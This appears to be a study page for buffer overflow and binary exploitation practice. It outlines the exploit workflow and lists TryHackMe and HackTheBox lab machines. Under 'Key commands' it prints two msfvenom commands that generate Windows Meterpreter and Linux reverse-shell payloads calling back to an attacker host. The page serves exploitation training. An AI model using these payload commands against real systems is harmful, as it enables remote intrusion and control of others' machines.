ZeroBox

Buffer Overflow and Binary Exploitation: practice machines and key commands

A classic stack buffer overflow overwrites the saved return address so execution jumps to code you control. The standard workflow is to fuzz the input until the program crashes, find the exact offset with a cyclic pattern, identify bad characters, locate a JMP ESP instruction in a module without protections and generate shellcode with msfvenom. Debuggers such as Immunity, x64dbg or gdb with pwndbg make each step visible. Modern targets add ASLR, DEP and stack canaries, which call for return-oriented programming or information leaks. Practise the manual process until it is repeatable, because exam style tasks reward a clean methodology. Write down offsets and bad characters as you go. These machines include overflow or binary analysis tasks. Restart the vulnerable service between attempts to keep memory layout predictable.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

msfvenom Windows x64 Reverse Meterpreter EXE

Generate raw Windows x64 executable reverse meterpreter.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o payload.exe

msfvenom Linux x64 Staged Reverse TCP ELF

Compile standalone ELF reverse shell binary for x64 Linux target.

msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf

Keep going

Buffer Overflow and Binary Exploitation machines (13)

1 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 7 Linux, 6 Windows.

Easy (4)

MachinePlatformOSTags
CyberHeroesTHMLinuxReverse-Engineering, Authentication-Bypass, JavaScript
BuffHTBWindowsBuffer-Overflow, HTB, Port-Forwarding, Unauthenticated-RCE
Buffer Overflow PrepTHMWindowsOSCP, Buffer Overflow, x86, Mona.py
ShoppyHTBLinuxHTB, NoSQL-Injection, Reverse-Engineering

Medium (4)

MachinePlatformOSTags
BrainstormTHMWindowsBuffer-Overflow, FTP, x86
GatekeeperTHMWindowsBuffer-Overflow, Oscilloscope
Reversing ELFTHMLinuxReverse-Engineering, GDB, Radare2, Binary-Analysis
The Cod CaperTHMLinuxOSCP, SQLi, Command Injection, Buffer Overflow

Hard (4)

MachinePlatformOSTags
AV Evasion: ShellcodeTHMWindowsRed Team, AV Evasion, Shellcode, AMSI
Brainpan 1THMLinuxOSCP, Buffer Overflow, Binary Exploitation, Wine
EarlyAccessHTBLinuxCommand-injection, HTB, Linux-capabilities, PHP-filtering
OverflowHTBLinux2021, 22204, Buffer-Overflow, CVE-2021-22204

Insane (1)

MachinePlatformOSTags
BankrobberHTBWindowsBuffer-Overflow, Command-Injection, File-read-through-SQLi, HTB

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox